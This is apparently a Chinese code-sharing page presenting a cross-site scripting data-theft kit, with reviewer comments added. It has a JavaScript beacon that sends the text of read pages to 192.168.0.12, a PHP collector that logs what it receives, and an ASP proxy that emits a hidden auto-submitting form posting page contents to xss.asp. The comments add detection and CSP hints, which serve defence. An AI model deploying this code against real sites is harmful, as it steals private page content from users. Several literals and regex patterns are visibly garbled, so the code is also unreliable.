js: 复制代码 代码如下:
// Client-side half: reads two pages through Internet Explorer's legacy
// "download" default behavior and forwards their text to a second host.
// NOTE(review): this listing was flattened by the page extractor and several
// string literals look damaged (the "n" fragments, the nested quotes further
// down), so it should be read as an illustration, not as a faithful copy.
// NOTE(review): element behaviors (addBehavior) exist only in old IE document
// modes, and startDownload is limited to same-domain URLs, so the script is
// only meaningful when it runs inside the site whose pages it reads, i.e.
// after a script-injection flaw. Output encoding removes that precondition;
// a Content-Security-Policy that restricts img-src blocks the beacon below.
document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
// Request every listed relative page; GetData is passed as the callback.
for (x in mycars ) {
  if(document.body.startDownload(mycars[x],GetData)){
    // `source` is not defined in this scope in the visible code.
    GetData(source);
  }
}
// Callback: escape() the downloaded text and hand it to the sender.
function GetData(source) {
  txt=escape(source);
  getReaded(txt);
}
// Sends the escaped text as the `key` query parameter of an image request to
// 192.168.0.12. For detection: this shows up as a GET for style.php with a
// very long query string, issued from a page that never references that host.
function getReaded(usr) {
  var newimg = new Image();
  newimg.src="http://192.168.0.12/style.php?key="+"n"+"n"+usr+"n"+"n";
}
php: 复制代码 代码如下:
<?php
// Receiving half: decodes the `key` parameter and appends it to news.html.
// NOTE(review): the endpoint has no authentication, size limit or output
// encoding, and whatever it receives is appended to a file with an .html
// name, so the collector is itself an injection sink for anyone who can
// reach it.
// NOTE(review): the header announces GB2312 while unescape() converts to
// UTF-8; the two do not agree in the visible code.
header('Content-Type:text/html;charset=GB2312');
// Decodes percent-encoding, then converts %uXXXX sequences to UTF-8.
// NOTE(review): the second and third branches compare a 3- and a 2-character
// substring against an empty string and therefore never match as printed;
// the literals and parts of the pattern were probably lost in extraction.
function unescape($str) {
  $str = rawurldecode($str);
  preg_match_all("/%u.{4}|.{4};|d+;|.+/U",$str,$r);
  $ar = $r[0];
  foreach($ar as $k=>$v) {
    if(substr($v,0,2) == "%u")
      $ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
    elseif(substr($v,0,3) == "")
      $ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
    elseif(substr($v,0,2) == "") {
      $ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
    }
  }
  return join("",$ar);
}
$file="news.html";
$_GET['key']=unescape($_GET['key']);
// Opened in append mode; the handle is never closed and the fopen() result is
// not checked.
fputs(fopen($file,'a+'),$_GET['key']);
?>
=================================================以下通用了===============
复制代码 代码如下:
<%
' Server-side variant: the ASP page fetches two hard-coded pages itself,
' rewrites their links, and embeds the escaped result in script that posts it
' to another host.
' NOTE(review): the fetch is made by the web server, so it reaches whatever
' the server can reach (both URLs here are private 192.168.0.5 addresses).
' Limiting outbound requests from the web tier restricts this.
Response.Buffer = True
Dim sUrlB,send(2)
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm"))
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm"))
' Fetches xmlpath through getHTTPPage and returns the HTML after a series of
' regular-expression rewrites of its link attributes.
' NOTE(review): several patterns look damaged by extraction ("(?)", the "[]"
' inside character classes, unescaped "."), so the exact matching behavior
' cannot be confirmed from this listing.
function PageWebProxy(xmlpath)
  Dim i, re, Url, Html
  Url = xmlpath
  Set re = New RegExp
  re.IgnoreCase = True
  re.Global = True
  ' sUrlB is script-level (declared outside the function) and is also read by
  ' getHTTPPage.
  sUrlB = Url
  Html = getHTTPPage(Url)
  ' Url becomes the directory part of the address; sUrlB loses its query string.
  Url = Left(Url, InStrRev(Url, "/"))
  i = InStr(sUrlB, "?")
  If i > 0 Then
    sUrlB = Left(sUrlB, i - 1)
  End If
  re.Pattern = "(href|action)=('|"")?(?)"
  Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
  ' Attributes that already hold absolute or javascript: URLs are renamed with
  ' an "x" suffix here and renamed back further down.
  re.Pattern = "(src|action|href)=('|"")?((http|https|javascript):[A-Za-z0-9./=?%-&_~`@[]':+!]+([^<>""])+)('|"")?"
  Html = re.Replace(Html,"$1x=$2$3$2")
  re.Pattern = "(window.open|url)(('|"")?((http|https):(//|\\)[A-Za-z0-9./=?%-&_~`@[]:+!]+([^'<>""])+)('|"")?)"
  Html = re.Replace(Html,"$1x($2$3$2)")
  ' The remaining attribute values get the directory (Url) or the host
  ' (Split(Url, "/")(2)) prepended.
  re.Pattern = "(src|action|href|background)=('|"")?([^/""'][A-Za-z0-9./=?%-&_~`@[]:+!]+([^'<>""])+)('|"")?"
  Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
  re.Pattern = "(src|action|href|background)=('|"")?/([^""'][A-Za-z0-9./=?%-&_~`@[]:+!]+([^'<>""])+)('|"")?"
  Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
  re.Pattern = "(src|action|href)=('|"")?/('|"")?"
  Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
  re.Pattern = "(window.open|url)(('|"")?([^/""'http:][A-Za-z0-9./=?%-&_~`@[]+!]+([^'<>""])+)('|"")?)"
  Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
  re.Pattern = "(window.open|url)(('|"")?/([^""'http:][A-Za-z0-9./=?%-&_~`@[]+!]+([^'<>""])+)('|"")?)"
  Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
  ' Every "&" is percent-encoded, then a fixed list of entity spellings is
  ' replaced; one host name gets a different treatment of "&amp;".
  Html = Replace(Html, "&", "%26")
  If Split(Url, "/")(2) = "club.isso.com.cn" Then
    Html = Replace(Html, "%26amp;", "%26")
  Else
    Html = Replace(Html, "%26amp;", "&")
  End If
  Html = Replace(Html, "%26nbsp;", " ")
  Html = Replace(Html, "%26lt;", "<")
  Html = Replace(Html, "%26gt;", ">")
  Html = Replace(Html, "%26quot;", """)
  Html = Replace(Html, "%26copy;", "©")
  Html = Replace(Html, "%26reg;", "®")
  Html = Replace(Html, "%26raquo;", "»")
  Html = Replace(Html, "%26%26", "&&")
  Html = Replace(Html, "%26#", "")
  ' Html = Replace(Html, "%26", "")
  ' Undo the temporary "x" suffix, then prefix absolute URLs with "?url=".
  re.Pattern = "(src|action|href)x=('|"")?((http|https|javascript):[A-Za-z0-9./=?%-&_~`@[]':+!]+([^<>""])+)('|"")?"
  Html = re.Replace(Html,"$1=$2$3$2")
  re.Pattern = "((http|https):(//|\\)[A-Za-z0-9./=?%-&_~`@[]':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))"
  Html = re.Replace(Html,"?url=$1")
  re.Pattern = "?url=" & Url & "(#|javascript:)"
  Html = re.Replace(Html,"$1")
  ' Multipart form encoding declarations are stripped from the markup.
  re.Pattern = "multipart/form-data"
  Html = re.Replace(Html,"")
  PageWebProxy=Html
End function
' Performs the HTTP request for url. When the incoming request carries form
' fields they are re-encoded and sent as a POST body, otherwise a GET is
' issued. The return value is set only on the text branch (body decoded as
' GB2312); the two extension-matched branches write the raw body to the
' response instead.
' NOTE(review): the incoming form is relayed to the target unchanged, and the
' Content-Disposition file name is built from the URL without sanitising.
' Both would need validation if the URL ever came from the request.
Function getHTTPPage(url)
  Dim Http, theStr, fileExt
  Set Http = Server.CreateObject("MSXML2.XMLHTTP")
  If Request.Form.Count > 0 Then
    For Each x In Request.Form
      theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&"
    Next
    Http.Open "POST", url, False
    Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
    Http.Send(theStr)
  Else
    Http.Open "GET", url, False
    Http.Send()
  End If
  ' Returns early (empty result) without releasing Http when the request did
  ' not reach readyState 4.
  If Http.readystate<>4 then Exit Function
  ' Extension is taken from the text after the last "." of the URL.
  fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
  If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
    Response.Clear
    Response.BinaryWrite Http.responseBody
    Response.End()
  Else
    If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
      Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
      Response.BinaryWrite Http.responseBody
      Response.Flush
    Else
      getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312")
    End If
  End If
  Set Http = Nothing
End Function
' Converts a byte array to text: writes it into an ADODB stream in binary mode
' (Type = 1), rewinds, switches the stream to text mode (Type = 2) with the
' charset Cset, and reads it back.
Function BytesToBstr(body,Cset)
  Dim objstream
  Set objstream = Server.CreateObject("adodb.stream")
  objstream.Type = 1
  objstream.Mode =3
  objstream.Open
  objstream.Write body
  objstream.Position = 0
  objstream.Type = 2
  objstream.Charset = Cset
  BytesToBstr = objstream.ReadText
  objstream.Close
  Set objstream = nothing
End Function
%>
// Client-side script emitted after the ASP block: writes a hidden iframe and
// a hidden form targeting it, fills two hidden fields with the source URL plus
// the page content rendered by <%=send(n)%>, and submits the form to
// http://192.168.0.12/xss.asp without user interaction.
// NOTE(review): the first writeln() has unescaped double quotes around "mimi"
// inside a double-quoted string, so it is not valid JavaScript as printed.
// NOTE(review): a Content-Security-Policy form-action directive on the page
// that renders this script would block the cross-host POST; in proxy logs it
// appears as an automatic POST to xss.asp with two large fields, var and
// vartwo.
document.writeln("<iframe name="mimi" src=about:blank style=display:none></iframe>")
document.writeln("<form id=form action=http://192.168.0.12/xss.asp method=POST target=mimi>");
document.writeln("<input id=var name=var type=hidden>");
document.writeln("<input id=vartwo name=vartwo type=hidden>");
document.writeln("<input type=submit 
style=display:none>");
document.writeln("</form>")
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>');
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>');
document.getElementById("form").submit();
本文标题:xss文件页面内容读取(解决)